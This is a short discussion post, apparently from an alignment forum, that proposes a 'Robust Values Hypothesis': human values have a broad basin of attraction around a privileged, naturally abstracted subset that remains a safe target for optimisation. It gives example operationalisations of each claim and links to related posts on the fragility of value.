Now suppose someone comes to you and says, "Hi. I'm working on AI safety, which I think is the biggest problem in the world. There are several very different approaches for doing this. I'm extremely confident (99%+) that the approach I've worked on the most and know the best will fail. Therefore, my policy recommendation is that we all keep working on that approach and ignore the rest."
I'm not saying the above describes Eliezer, only that the ways in which it doesn't are not obvious. Presumably Eliezer thinks that the other approaches are even more doomed (or at least doomed to a degree that's sufficient to make them not worth talking about), but it's unclear why that is or why we can be confident in it given the lack of effort that has been extended so far.
Take this comment as an example:
> How about if you solve a ban on gain-of-function research [before trying the policy approach], and then move on to much harder problems like AGI? A victory on this relatively easy case would result in a lot of valuable gained experience, or, alternatively, allow foolish optimists to have their dangerous optimism broken over shorter time horizons.
This reply ma |
774c0f3e-7343-4394-993f-4c3de31b4aef | StampyAI/alignment-research-dataset/alignmentforum | Alignment Forum | Direction of Fit
This concept has recently become a core part of my toolkit for thinking about the world, and I find it helps explain a lot of things that previously felt confusing to me. Here I explain how I understand “direction of fit,” and give some examples of where I find the concept can be useful.
Handshake Robot
===============
A friend recently returned from an [artificial life conference](https://2023.alife.org/) and told me about a [robot](https://arxiv.org/abs/2303.15213) which was designed to perform a handshake. It was given a prior about handshakes, or how it expected a handshake to be. When it shook a person’s hand, it then updated this prior, and the degree to which the robot would update its prior was determined by a single parameter. If the parameter was set low, the robot would refuse to update, and the handshake would be firm and forceful. If the parameter was set high, the robot would completely update, and the handshake would be passive and weak. 
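In code, the mechanism is just an interpolation knob. Here is a minimal sketch in TypeScript (all names and numbers are mine, not from the paper, whose model is of course richer than a single scalar):

```typescript
// One scalar in [0, 1] controls how much the prior yields to the observation.
// lambda = 0: never update -- the world must fit the robot's mind (firm handshake).
// lambda = 1: fully update -- the robot's mind fits the world (passive handshake).
function updatePrior(prior: number, observation: number, lambda: number): number {
  return (1 - lambda) * prior + lambda * observation;
}

// Illustrative: prior expected grip force 5.0, observed grip force 2.0.
console.log(updatePrior(5.0, 2.0, 0.0)); // 5.0 -- insists on its expectation
console.log(updatePrior(5.0, 2.0, 1.0)); // 2.0 -- mirrors the partner entirely
console.log(updatePrior(5.0, 2.0, 0.5)); // 3.5 -- somewhere in between
```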
This parameter determines the [direction of fit](https://en.wikipedia.org/wiki/Direction_of_fit): whether the object in its mind will adapt to match the world, or whether the robot will adapt the world to match the object in its mind. This concept is often used in philosophy of mind to distinguish between a **belief**, which has a **mind-to-world** direction of fit, and a **desire**, which has a **world-to-mind** direction of fit. In this frame, beliefs and desires are both of a [similar type](https://www.lesswrong.com/posts/kYgWmKJnqq8QkbjFj/bayesian-utility-representing-preference-by-probability): they both describe ways the world could be. The practical differences only emerge through how they end up interacting with the outside world.
Many objects seem not to be perfectly separable into one of these two categories, and rather appear to exist somewhere on the spectrum. For example:
* An instrumental goal can simultaneously be a belief about the world (that achieving the goal will help fulfill some desire) as well as behaving like a desired state of the world in its own right.
* Strongly held beliefs (e.g. religious beliefs) are on the surface ideas which are fit to the world, but in practice behave much more like desires, as people make the world around them fit their beliefs.
* You can change your mind about what you desire. For example you may dislike something at first, but after repeated exposure you may come to feel neutral about it, or even actively like it (e.g. the taste of certain foods).
Furthermore, the direction of fit might be context dependent (e.g. political beliefs), beliefs could be [self fulfilling](http://cyborganthropology.com/Hyperstition) (e.g. believing that a presentation will go well could make it go well), and many beliefs or desires could refer to other beliefs or desires (wanting to believe, believing that you want, etc.).
Idealized Rational Agents
=========================
The concept of a rational agent, in this frame, is a system which cleanly distinguishes between these two directions of fit, between objects which describe how the world actually is, and objects which prescribe how the world “should” be.

This particular concept of a rational agent can itself have a varying direction of fit. You might describe a system as a rational agent to [help your expectations match your observations](https://en.wikipedia.org/wiki/Intentional_stance), but the idea might also prescribe that you [should develop](https://www.youtube.com/watch?v=NxqTOm3TzsY) this clean split between belief and value.
When talking about AI systems, we might be interested in the behavior of systems where this distinction is especially clear. We might observe that many current AI systems are not well described in this way, or we could speculate about pressures which might lead them toward this kind of split.

Note that this is very different from talking about [VNM-rationality](https://en.wikipedia.org/wiki/Von_Neumann%E2%80%93Morgenstern_utility_theorem), which starts by assuming this clean split, and instead demonstrates why we might expect the different parts of the value model to become [coherent](https://www.lesswrong.com/posts/RQpNHSiWaXTvDxt6R/coherent-decisions-imply-consistent-utilities) and avoid getting in each other’s way. The direction-of-fit frame highlights a separate (but equally important) [question](https://www.lesswrong.com/posts/dKTh9Td3KaJ8QW6gw/why-assume-agis-will-optimize-for-fixed-goals) of whether, and to what extent, we should expect systems which have this strong distinction between belief-like-objects and desire-like-objects in the first place.
Base Models
===========
At first glance, when interacting with a base model, the direction of fit seems mostly to be mind-to-world. It doesn't seem to have strong convictions, is not well described as having desires, and instead behaves much more like a powerful "mirror" to the text it sees. This makes sense, because it was only trained to be a predictor, and never to take action in an environment. Its success in development depended entirely on its ability to fit itself to the training data.

This mind-to-world direction of fit does begin to get weird when GPT is asked to predict text that [it generated](https://www.lesswrong.com/posts/nH4c3Q9t9F3nJ7y8W/gpts-are-predictors-not-imitators?commentId=aKFvrZiZ2aEdBvYc2), and the “world” begins to [contain pieces of itself](https://www.lesswrong.com/posts/kFCu3batN8k8mwtmh/the-cave-allegory-revisited-understanding-gpt-s-worldview). This happens by default whenever GPT generates more than a single token (as it conditions on its own past generations), but also when GPT generations are used as a part of the training data. When a predictor is asked to [predict itself](https://www.lesswrong.com/posts/SwcyMEgLyd4C3Dern/the-parable-of-predict-o-matic), we get a kind of [loop](https://en.wikipedia.org/wiki/Strange_loop) of self reference, and it’s not clear in advance what behavior we should expect from a system like that.
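As a toy sketch of why this self-reference is baked into multi-token generation: each sampled token is appended to the very context the model conditions on next, so the "world" being predicted immediately contains the model's own output. (`Model` below is a stand-in type of my own, not any real API.)

```typescript
// Stand-in for a trained predictor: maps a context to a next token.
type Model = (context: string[]) => string;

function generate(model: Model, prompt: string[], steps: number): string[] {
  const context = [...prompt];
  for (let i = 0; i < steps; i++) {
    const next = model(context); // prediction conditioned on the context...
    context.push(next);          // ...which now includes the model's own outputs
  }
  return context;
}
```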

Chat Models
===========
Things also get muddied when we take a base model and train it to be more than a predictor, and reward behavior which does more than just mirror the text, like in the case of ChatGPT. When interacting with ChatGPT, it does feel more natural to begin talking about things that look more like they have a world-to-mind direction of fit, like the refusal to discuss certain topics, or the [strong pull](https://www.lesswrong.com/posts/t9svvNPNmFf5Qa3TA/mysteries-of-mode-collapse) toward speaking in a particular style.
We could interpret these pulls as desires (e.g. the chat model wants the assistant character to avoid discussing suicide), or we could interpret them as deeply held beliefs (e.g. a strong prior that the assistant character never discusses suicide). The interesting thing about this direction of fit frame is that these two explanations are essentially saying the same thing.
Conclusion
==========
I hope this gives some taste for why this concept might be useful for thinking about intelligence and agency. In particular, I feel like it digs at the distinction between beliefs and values in a way that avoids overly constraining the space of possible minds. |
17447553-83ac-4f1e-82ad-f62a839276f0 | trentmkelly/LessWrong-43k | LessWrong | The Price of Integrity
Related Posts: Prices or Bindings?
On the evening of August 14th, 2006 a pair of Fox News journalists, Steve Centanni and Olaf Wiig were seized by Islamic militants while on assignment in Gaza City. Nothing was heard of them for nine days until a group calling themselves the Holy Jihad Brigades took credit for the kidnappings. They issued an ultimatum, demanding the release of Muslim prisoners from American jails within a 72-hour time frame. Their demands were not met.
But then a few days later the journalists were allowed to go free... but not before they’d been forced into converting to Islam at gunpoint, and had each videotaped a statement denouncing U.S. and Israeli foreign policy.
The war raged on.
A couple of kidnapped journalists is nothing new (certainly not three years after the fact) and aside from the happy ending this particular case wouldn't be worth mentioning if not for a unique twist that occurred after they returned home. A fellow Fox News contributor, Sandy Rios, openly criticized the two men; she said that no true Christian would convert – falsely or otherwise – merely because they were threatened with death. As she later explained to Bill Maher:*
> My point was that Christians – I don’t know what their faith is – but I’m talking about Christians who responded to the story and said that they would have done the same thing...
>
> Christ followers can’t do that. We don’t have that freedom. We have to profess Christ no matter what... Christianity is, by its very nature, radical. It is not normal or natural to lay down your life for a friend. It is not natural or normal to say ‘I will not deny my faith even if you do cut my head off.'
I agree with her, and admire her courage for sticking with her convictions. If you buy into Christianity's metaphysical claims, then bearing false witness to your faith ought to be considered a serious crime; not only does it show a pathological attachment to life (when eternal bliss lies just around the corn |
e0987dd0-de61-4c82-becc-5600087460ca | StampyAI/alignment-research-dataset/lesswrong | LessWrong | FLI report: Policymaking in the Pause
> **this policy brief provides policymakers with concrete recommendations for how governments can manage AI risks.**
>
>
> **Policy recommendations:**
> 1. Mandate robust third-party auditing and certification.
> 2. Regulate access to computational power.
> 3. Establish capable AI agencies at the national level.
> 4. Establish liability for AI-caused harms.
> 5. Introduce measures to prevent and track AI model leaks.
> 6. Expand technical AI safety research funding.
> 7. Develop standards for identifying and managing AI-generated content and recommendations.
>
> |
b669b3a4-5403-4539-b24a-acbd8421ba12 | trentmkelly/LessWrong-43k | LessWrong | JFK was not assassinated: prior probability zero events
A lot of my work involves tweaking the utility or probability of an agent to make it believe - or act as if it believed - impossible or almost impossible events. But we have to be careful about this; an agent that believes the impossible may not be so different from one that doesn't.
Consider for instance an agent that assigns a prior probability of zero to JFK ever having been assassinated. No matter what evidence you present to it, it will go on disbelieving the "non-zero gunmen theory".
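This is just Bayes' rule doing what it must: a prior of zero is a fixed point of updating, no matter how lopsided the likelihood ratio. A quick TypeScript sketch (the numbers are purely illustrative):

```typescript
// Posterior P(H|E) for a binary hypothesis, via Bayes' rule.
function posterior(prior: number, pEgivenH: number, pEgivenNotH: number): number {
  const pE = pEgivenH * prior + pEgivenNotH * (1 - prior);
  return (pEgivenH * prior) / pE;
}

// Evidence a million times likelier under H cannot rescue a zero prior:
console.log(posterior(0, 0.999999, 0.000001));    // 0, always 0
// whereas a tiny-but-nonzero prior responds to the same evidence:
console.log(posterior(1e-9, 0.999999, 0.000001)); // ~0.001
```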
Initially, the agent will behave very unusually. If it had been in charge of JFK's security in Dallas before the shooting, it would have sent all secret service agents home, because no assassination could happen. Immediately after the assassination, it would have disbelieved everything. The films would have been faked or misinterpreted; the witnesses, deluded; the dead body of the president, that of a twin or an actor. It would have had huge problems with the aftermath, trying to reject all the evidence of death, seeing a vast conspiracy to hide the truth of JFK's non-death, including the many other conspiracy theories that must be false flags, because they all agree with the wrong statement that the president was actually assassinated.
But as time went on, the agent's behaviour would start to become more and more normal. It would realise the conspiracy was incredibly thorough in its faking of the evidence. All avenues it pursued to expose them would come to naught. It would stop expecting people to come forward and confess the joke; it would stop expecting to find radical new evidence overturning the accepted narrative. After a while, it would start to expect the next new piece of evidence to be in favour of the assassination idea - because if a conspiracy has been faking things this well so far, then they should continue to do so in the future. Though it cannot change its view of the assassination, its expectations for observations converge towards the norm.
If it does a really thor |
4eaa52e3-1bc1-4525-88ee-c6a89d84639a | trentmkelly/LessWrong-43k | LessWrong | The map of the risks of aliens
Stephen Hawking famously said that aliens are one of the main risks to human existence. In this map I will try to show all rational ways how aliens could result in human extinction. Paradoxically, even if aliens don’t exist, we may be even in bigger danger.
1. No aliens exist in our past light cone
1a. Great Filter is behind us. So Rare Earth is true. There are natural forces in our universe which are against life on Earth, but we don't know if they are still active. We strongly underestimate such forces because of anthropic shadow. Such still-active forces could be: gamma-ray bursts (and other types of cosmic explosions like magnetars), the instability of Earth's atmosphere, the frequency of large scale volcanism and asteroid impacts. We may also underestimate the fragility of our environment in its sensitivity to small human influences, like global warming becoming runaway global warming.
1b. Great filter is ahead of us (and it is not UFAI). Katja Grace shows that this is a much more probable solution to the Fermi paradox because of one particular version of the Doomsday argument, SIA. All technological civilizations go extinct before they become interstellar supercivilizations, that is, in something like the next century on the scale of Earth's timeline. This is in accordance with our observation that new technologies create stronger and stronger means of destruction which are available to smaller groups of people, and this process is exponential. So all civilizations terminate themselves before they can create AI, or their AI is unstable and self-terminates too (I have explained elsewhere why this could happen).
2. Aliens still exist in our light cone.
a) They exist in the form of a UFAI explosion wave, which is travelling through space at the speed of light. EY thinks that this will be a natural outcome of evolution of AI. We can’t see the wave by definition, and we can find ourselves only in the regions of the Universe, which it hasn’t ye |
0143a51c-1d46-49bc-8512-441f67fe83bf | trentmkelly/LessWrong-43k | LessWrong | Everything I ever needed to know, I learned from World of Warcraft: Incentives and rewards
This is the second in a series of posts about lessons from my experiences in World of Warcraft. I’ve been talking about this stuff for a long time—in forum comments, in IRC conversations, etc.—and this series is my attempt to make it all a bit more legible. I’ve added footnotes to explain some of the jargon, but if anything remains incomprehensible, let me know in the comments.
Previous post in series: Goodhart’s law.
----------------------------------------
“How do we split the loot?”
That was one of the biggest challenges of raiding in World of Warcraft.
We’ve gotten 40 people together; we’ve kept them focused on the task, for several hours straight; we’ve coordinated their efforts; we’ve figured out the optimal strategy and tactics for taking down the raid boss; we’ve executed flawlessly (or close enough, anyway). Now, the dragon (or demon, or sentient colossus of magically animated lava) lies dead at our feet, and we’re staring at the fabulous treasure that was his, and is now ours; and the question is: who gets it?
The problem of the indivisible
“Why not divide it 40 ways? That’s only fair!”
If only it were that easy! But the loot can’t be split 40 ways, because it’s not just a giant pile of gold coins; it’s (for instance): a magic warhammer, a magic staff, and a magic robe. Three[1] items; each quite valuable and desirable; each of which can be given to one person, and cannot be sold or traded thereafter. We have to decide, here and now, which three out of the 40 members of the raid will receive one of these rewards. The other 37 get nothing.
What to do?
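(For reference, the naive baseline built into the game was a random roll: everyone interested in the item types /roll, highest number wins. A sketch of that mechanism is below; it is fair in expectation, but it ignores attendance, past wins, and who benefits most, which is exactly why guilds kept looking for something better.)

```typescript
// The in-game baseline: each interested player rolls 1-100, highest wins.
// Assumes a non-empty list of interested players.
function rollForLoot(interested: string[]): string {
  let winner = interested[0];
  let best = 0;
  for (const player of interested) {
    const roll = Math.floor(Math.random() * 100) + 1; // /roll 100
    if (roll > best) {
      best = roll;
      winner = player;
    }
  }
  return winner;
}
```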
It would be difficult to overstate how much thought went into answering this question, among WoW players; how much effort was spent on debating it; how much acrimony it spawned; and how critical was a good answer to it, in determining success in the most challenging endeavors in the game (high-end raiding). Disagreements in matters of loot distribution broke friendships, and ill-advised loot policies |
e45205f2-8602-44a1-a816-62def5cdcfe3 | trentmkelly/LessWrong-43k | LessWrong | Shared Cache is Going Away
Browsers historically have had a single HTTP Cache. This meant that if www.a.example and www.b.example both used cdn.example/jquery-1.2.1.js then JQuery would only be downloaded once. Since it's the same resource regardless of which site initiates the download, a single shared cache is more efficient. [1]
Unfortunately, a shared cache enables a privacy leak. Summary of the simplest version (a sketch of the probe follows the list):
* I want to know if you're a moderator on www.forum.example.
* I know that only pages under www.forum.example/moderators/private/ load www.forum.example/moderators/header.css.
* When you visit my page I load www.forum.example/moderators/header.css and see if it came from cache.
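Here is a minimal sketch of that probing step in TypeScript, assuming a shared cache and an invented timing threshold (real attacks, including the one Vela described, use more reliable signals than a fixed cutoff):

```typescript
// Runs in the attacker's page. If the victim recently visited the moderator
// area, this stylesheet is already in the shared cache and loads much faster.
async function probe(url: string, thresholdMs = 20): Promise<boolean> {
  const start = performance.now();
  // 'no-cors' lets us time a cross-origin fetch without reading its contents.
  await fetch(url, { mode: "no-cors" });
  return performance.now() - start < thresholdMs; // fast => likely cached
}

probe("https://www.forum.example/moderators/header.css")
  .then(cached => console.log("likely a moderator:", cached));
```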
Versions of this have been around for a while, but in March 2019 Eduardo Vela disclosed a way to make it much more powerful and reliable. Browsers are responding by partitioning the cache (Chrome, Firefox; Safari already had). [2] It's not clear to me from reading the bugs when it will launch, but it does sound soon. [3]
What does this mean for developers? The main thing is that there's no longer any advantage to trying to use the same URLs as other sites. You won't get performance benefits from using a canonical URL over hosting on your own site (unless they're on a CDN and you're not) and you have no reason to use the same version as everyone else (but staying current is still a good idea).
I'm sad about this change from a general web performance perspective and from the perspective of someone who really likes small independent sites, but I don't see a way to get the performance benefits without the leaks.
[1] When I worked on mod_pagespeed, rewriting web pages so they would load faster, we had an opt-in feature to Canonicalize JavaScript Libraries.
[2] I was curious if this had launched yet so I made a pair of test pages and tried it out in WebPageTest for Chrome Canary and Firefox Nightly but it's not out yet. I used a WPT script consisting of:
navigate https://www.trycontra.com/test/cache-pa |
22bbe39c-e837-49f6-a94a-86b3a8608f5e | trentmkelly/LessWrong-43k | LessWrong | AI Box Role Plays
This page is to centralize discussion for the AI Box Role Plays I will be doing as the AI.
Rules are as here. In accordance with "Regardless of the result, neither party shall ever reveal anything of what goes on within the AI-Box experiment except the outcome. Exceptions to this rule may occur only with the consent of both parties," I ask that if I break free multiple times I am permitted to say if I think it was the same or different arguments that persuaded my Gatekeepers.
In the first trial, with Normal_Anomaly, the wager was 50 karma. The AI remained in the box; upvote Normal_Anomaly here, downvote lessdazed here. It was agreed to halve the wager from 50 karma to 25 due to the specific circumstances concluding the role-play, in which the outcome depended on variables that hadn't been specified, but if that sounds contemptible to you, downvote all the way to -50.
Also below are brief statements of intent by Gatekeepers to not let the AI out of the box, submitted before the role play, as well as before and after statements of approximately how effective they think both a) a human and b) a superintelligence would be at convincing them to let it out of a box. |
d238e337-602c-4136-8fd2-82f722e62837 | trentmkelly/LessWrong-43k | LessWrong | What I've been doing instead of writing
I’ve been too busy with work to write much recently, but in lieu of that, here’s a batch of links to other stuff I’ve been doing elsewhere.
The thing I’m most excited about:
* Wave raises $200m from Sequoia, Stripe, Founders Fund and Ribbit at a $1.7b valuation. It’ll fund faster expansion across Africa. I’m pumped for us to save tons of money + time for even more people!
* One of our investors from Founders Fund wrote an amazing deep dive into our vision and strategy. (Sadly, we had to ask Everett to cut the best part for confidentiality reasons—though I’m allowed to tell it to potential hires, so if you’re curious… you know what to do!)
* On the Wave blog I wrote up my argument for why working at Wave is an extremely effective way to improve the world. (I expect to write a lot more for Wave’s blog in the future, so consider subscribing if you want to keep up with it!)
This is probably a good time to mention that we are hiring! A lot! If you’re an engineer or engineering leader, and you like tracking your impact in units like “number of households lifted out of extreme poverty,"1 let’s talk.
Other non-writing activities:
* I gave a talk at !!con 2020—a conference whose only rule is that you must be super excited about your topic—on some of the things Wave has done to make our app work reliably on unreliable mobile networks: 89 characters of base-11?! Mobile networking in rural Ethiopia!
* Alexey Guzey interviewed me about… a lot of stuff… including what habits have helped me the most to be effective, productively channeling neuroticism, what I learned from starting Harvard Effective Altruism, and what it feels like to repeatedly sample from a heavy-tailed distribution.
* I appeared on the Narratives podcast where we talked about deciding what to do with your life, differences between management and engineering, cool parts of Wave’s culture, “staring into the abyss,” and other fun stuff.
* I’ve occasionally been posting proto-blog-post threads to Twi |
2a9f6bf2-f35c-4e3b-b6bd-5ffb2583b925 | trentmkelly/LessWrong-43k | LessWrong | Meetup : Melbourne Social Meetup: Boardgames In The Pub
Discussion article for the meetup : Melbourne Social Meetup: Boardgames In The Pub
WHEN: 15 August 2014 06:30:00PM (+1000)
WHERE: Alchemist's Refuge, 328 Little Lonsdale St, Melbourne VIC 3000
IMPORTANT: CHANGE OF VENUE. Due to a date mixup the trivia is NOT going ahead; we are instead going to play games at Games Lab / Alchemist's Refuge. For August's social LW meetup, we will be going to Alchemist's Refuge, a quiet basement bar that is boardgame friendly. We'll meet there starting from 6:30pm. If we have any large groups that would like to play games, there is plenty of space upstairs in Games Lab. If you have any issues you can call me on 0421 231 789.
Discussion article for the meetup : Melbourne Social Meetup: Boardgames In The Pub |
493ff984-52c6-451c-9ea9-49085acab969 | LDJnr/LessWrong-Amplify-Instruct | LessWrong | "From Robyn Dawes’s Rational Choice in an Uncertain World.1 Bolding added. Norman R. F. Maier noted that when a group faces a problem, the natural tendency of its members is to propose possible solutions as they begin to discuss the problem. Consequently, the group interaction focuses on the merits and problems of the proposed solutions, people become emotionally attached to the ones they have suggested, and superior solutions are not suggested. Maier enacted an edict to enhance group problem solving: “Do not propose solutions until the problem has been discussed as thoroughly as possible without suggesting any.” It is easy to show that this edict works in contexts where there are objectively defined good solutions to problems. Maier devised the following “role playing” experiment to demonstrate his point. Three employees of differing ability work on an assembly line. They rotate among three jobs that require different levels of ability, because the most able—who is also the most dominant—is strongly motivated to avoid boredom. In contrast, the least able worker, aware that he does not perform the more difficult jobs as well as the other two, has agreed to rotation because of the dominance of his able co-worker. An “efficiency expert” notes that if the most able employee were given the most difficult task and the least able the least difficult, productivity could be improved by 20%, and the expert recommends that the employees stop rotating. The three employees and . . . a fourth person designated to play the role of foreman are asked to discuss the expert’s recommendation. Some role-playing groups are given Maier’s edict not to discuss solutions until having discussed the problem thoroughly, while others are not. Those who are not given the edict immediately begin to argue about the importance of productivity versus worker autonomy and the avoidance of boredom. Groups presented with the edict have a much higher probability of arriving at the solution that the two more able workers rotate, while the least able one sticks to the least demanding job—a solution that yields a 19% increase in productivity. I have often used this edict with groups I have led—particularly when they face a very tough problem, which is when group members are most apt to propose solutions immediately. While I have no objective criterion on which to judge the quality of the problem solving of the groups, Maier’s edict appears to foster better solutions to problems. This is so true it’s not even funny. And it gets worse and worse the tougher the problem becomes. Take artificial intelligence, for example. A surprising number of people I meet seem to know exactly how to build an artificial general intelligence, without, say, knowing how to build an optical character recognizer or a collaborative filtering system (much easier problems). And as for building an AI with a positive impact on the world—a Friendly AI, loosely speaking—why, that problem is so incredibly difficult that an actual majority resolve the whole issue within fifteen seconds.2 Give me a break. This problem is by no means unique to AI. Physicists encounter plenty of nonphysicists with their own theories of physics, economists get to hear lots of amazing new theories of economics. If you’re an evolutionary biologist, anyone you meet can instantly solve any open problem in your field, usually by postulating group selection. Et cetera. 
Maier’s advice echoes the principle of the bottom line, that the effectiveness of our decisions is determined only by whatever evidence and processing we did in first arriving at our decisions—after you write the bottom line, it is too late to write more reasons above. If you make your decision very early on, it will, in fact, be based on very little thought, no matter how many amazing arguments you come up with afterward. And consider furthermore that we change our minds less often than we think: 24 people assigned an average 66% probability to the future choice thought more probable, but only 1 in 24 actually chose the option thought less probable. Once you can guess what your answer will be, you have probably already decided. If you can guess your answer half a second after hearing the question, then you have half a second in which to be intelligent. It’s not a lot of time. Traditional Rationality emphasizes falsification—the ability to relinquish an initial opinion when confronted by clear evidence against it. But once an idea gets into your head, it will probably require way too much evidence to get it out again. Worse, we don’t always have the luxury of overwhelming evidence. I suspect that a more powerful (and more difficult) method is to hold off on thinking of an answer. To suspend, draw out, that tiny moment when we can’t yet guess what our answer will be; thus giving our intelligence a longer time in which to act. Even half a minute would be an improvement over half a second. 1Robyn M. Dawes, Rational Choice in An Uncertain World, 1st ed., ed. Jerome Kagan (San Diego, CA: Harcourt Brace Jovanovich, 1988), 55–56. 2See Yudkowsky, “Artificial Intelligence as a Positive and Negative Factor in Global Risk.”"
The passage is from a user-contributed post on LessWrong.
Could you elaborate on the potential downsides of Maier's edict, particularly in situations where immediate action might be necessary?
Certainly. While Maier's edict is highly effective in fostering comprehensive problem-solving and reducing bias towards early solutions, there are scenarios where it might not be the best approach.
1. Urgency: In situations where time is of the essence, such as during emergencies or crises, waiting to discuss the problem thoroughly before suggesting solutions could lead to detrimental delays. Quick, decisive action might be more beneficial in these cases.
2. Over-analysis: There's a risk of falling into "analysis paralysis," where the group spends so much time discussing the problem that they struggle to move on to proposing and implementing solutions. This can lead to stagnation and inefficiency.
3. Group Dynamics: The edict assumes that all group members are equally willing and able to contribute to the problem discussion. However, in reality, power dynamics, personality differences, or varying levels of expertise could lead to an imbalanced discussion that doesn't fully explore the problem.
4. Complexity: For highly complex problems, it might be difficult to thoroughly discuss the problem without proposing potential solutions. Solutions can sometimes help in understanding the problem better, especially when dealing with intricate systems or abstract concepts.
5. Innovation: The edict might discourage innovative thinking. When people are free to suggest solutions early on, they might come up with creative or out-of-the-box ideas that wouldn't have surfaced in a more structured discussion.
In conclusion, while Maier's edict can enhance problem-solving in many contexts, it's important to consider the specific circumstances and adapt the approach accordingly.
Explain how the dynamics of personality differences within a group can impact the effectiveness of Maier's edict.
The effectiveness of Maier's edict can indeed be influenced by the varying personality differences within a group. Here's how:
1. Dominant Personalities: Individuals with dominant or assertive personalities may monopolize the discussion, preventing a thorough exploration of the problem from multiple perspectives. They might also push their own solutions prematurely, despite the edict.
2. Introverted Personalities: Introverted or shy individuals may not voice their thoughts and concerns as openly, which could lead to an incomplete understanding of the problem. Their valuable insights might be missed if they feel overwhelmed or overshadowed by more extroverted group members.
3. Analytical Personalities: Those with analytical personalities may thrive under Maier's edict, as they often prefer to understand a problem thoroughly before suggesting solutions. However, they might also lead the group into over-analysis, delaying the problem-solving process.
4. Innovative Personalities: Creative or innovative individuals might find the edict restrictive. These personalities often excel at brainstorming solutions and might become frustrated if they're not allowed to propose ideas early in the discussion.
5. Compliant Personalities: Individuals who are more compliant or agreeable might not question the prevailing group opinion, which could lead to a narrow understanding of the problem. They might also be more inclined to agree with the first proposed solution, even if it's not the best one.
In summary, while Maier's edict aims to promote thorough problem discussion, the varying personality types within a group can impact how effectively it's implemented. To maximize its effectiveness, a facilitator or group leader should be aware of these dynamics and manage the discussion in a way that encourages balanced participation and respects the diverse problem-solving styles of the group members.
Considering the impact of personality differences on the effectiveness of Maier's edict, how could a group leader manage these dynamics to ensure balanced participation and optimal problem-solving? Discuss the potential strategies and their effectiveness in different scenarios.
A group leader can employ several strategies to manage personality differences and ensure balanced participation and optimal problem-solving when using Maier's edict:
1. Set Clear Expectations: The leader should clearly communicate the purpose of the discussion and the rules of engagement, including Maier's edict. This helps set the stage for a focused and respectful discussion.
2. Facilitate Actively: The leader should actively guide the discussion, ensuring all voices are heard. They can invite quieter members to share their thoughts and manage dominant personalities to prevent them from overshadowing others.
3. Create a Safe Environment: The leader should foster an atmosphere where all ideas are valued, and it's safe to express different opinions. This encourages participation from all group members, regardless of their personality type.
4. Break Down the Problem: For complex problems, breaking them down into smaller, manageable parts can help the group tackle them more effectively. This can also make the discussion more accessible to all members, regardless of their level of expertise.
5. Use Brainstorming Sessions: While Maier's edict discourages early solution proposals, the leader can schedule separate brainstorming sessions once the problem has been thoroughly discussed. This allows creative personalities to shine and can generate a wide range of potential solutions.
6. Leverage Individual Strengths: The leader should acknowledge and leverage the strengths of different personalities. For instance, analytical individuals can be instrumental in problem analysis, while creative individuals can be more involved in solution generation.
7. Encourage Reflection: After the discussion, the leader can encourage members to reflect on the process and provide feedback. This can help identify any issues or biases that may have affected the discussion and improve future problem-solving sessions.
In different scenarios, these strategies can be adjusted. For instance, in a crisis situation where quick decisions are needed, the leader might need to take a more directive role. In contrast, when tackling a complex, long-term problem, more time can be spent on thorough discussion and reflection. The key is to remain flexible and responsive to the group's needs and the specific context of the problem. |
89e5a5eb-f2b7-449f-85ab-cc29ad5cb70e | trentmkelly/LessWrong-43k | LessWrong | Does it become easier, or harder, for the world to coordinate around not building AGI as time goes on?
(Or, is coordination easier in a long timeline?)
It seems like it would be good if the world could coordinate to not build AGI. That is, at some point in the future, when some number of teams have the technical ability to build and deploy an AGI, they all agree to voluntarily delay (perhaps on penalty of sanctions) until they’re confident that humanity knows how to align such a system.
Currently, this kind of coordination seems like a pretty implausible state of affairs. But I want to know if it seems like it becomes more or less plausible as time passes.
The following is my initial thinking in this area. I don’t know the relative importance of the factors that I listed, and there’s lots that I don’t understand about each of them. I would be glad for…
* Additional relevant factors.
* Arguments that some factor is much more important than the others.
* Corrections, clarifications, or counterarguments to any of this.
* Other answers to the question, that ignore my thoughts entirely.
If coordination gets harder over time, that’s probably because...
* Compute increases make developing and/or running an AGI cheaper. The most obvious consideration is that the cost of computing falls each year. If one of the bottlenecks for an AGI project is having large amounts of compute, then “having access to sufficient compute” is a gatekeeper criterion on who can build AGI. As the cost of computing continues to fall, more groups will be able to run AGI projects. The more people who can build an AGI, the harder it becomes to coordinate all of them into not deploying it.
* Note that it is unclear to what degree there is currently, or will be, a hardware overhang. If someone in 2019 could already run an AGI on only $10,000 worth of AWS, if only they knew how, then the cost of compute is not relevant to the question of coordination.
* The number of relevant actors increases. If someone builds an AGI in the next year, I am reasonably confident that that someone |
8ea807e3-a10d-47df-8244-71c531e3d64b | StampyAI/alignment-research-dataset/lesswrong | LessWrong | [DISC] Are Values Robust?
Epistemic Status
----------------
[Discussion question](https://www.lesswrong.com/posts/zhhYwM7gk8LZsDzxj/dragongod-s-shortform?commentId=vYqEZxYZwEnsiSKJ6).
Related Posts
-------------
See also:
* [Complexity of Value](https://www.lesswrong.com/tag/complexity-of-value)
* [Value is Fragile](https://www.lesswrong.com/posts/GNnHHmm8EzePmKzPk/value-is-fragile)
* [The Hidden Complexity of Wishes](https://www.lesswrong.com/posts/GNnHHmm8EzePmKzPk/value-is-fragile)
* [But exactly how complex and fragile?](https://www.lesswrong.com/posts/xzFQp7bmkoKfnae9R/but-exactly-how-complex-and-fragile)
---
Robust Values Hypothesis
========================
Consider the following hypothesis:
1. There exists a "broad basin of attraction" around a privileged subset of human values[[1]](#fn9jcddbn79a4) (henceforth "ideal values")
1. The larger the basin, the more robust values are
2. Example operationalisations[[2]](#fndzq2mb4spjb) of "privileged subset" that gesture in the right direction:
1. Minimal set that encompasses most of the informational content of "benevolent"/"universal"[[3]](#fnhxfnro75cc) human values
2. The "[minimal latents](https://www.lesswrong.com/posts/N2JcFZ3LCCsnK2Fep/the-minimal-latents-approach-to-natural-abstractions)" of "benevolent"/"universal" human values
3. Example operationalisations of "broad basin of attraction" that gesture in the right direction:
1. A neighbourhood of the privileged subset with the property that all points in the neighbourhood are suitable targets for optimisation (in the sense used in #3)
1. Larger neighbourhood → larger basin
2. Said subset is a "naturalish" abstraction
1. The more natural the abstraction, the more robust values are
2. Example operationalisations of "naturalish abstraction"
1. The subset is highly privileged by the inductive biases of most learning algorithms that can efficiently learn our universe
* More privileged → more natural
2. Most efficient representations of our universe contain a simple embedding of the subset
* Simpler embeddings → more natural
3. Points within this basin are suitable targets for optimisation
1. The stronger the optimisation pressure under which the target remains suitable, the more robust values are.
2. Example operationalisations of "suitable targets for optimisation":
1. Optimisation of this target is existentially safe[[4]](#fnyv07rz4tpq)
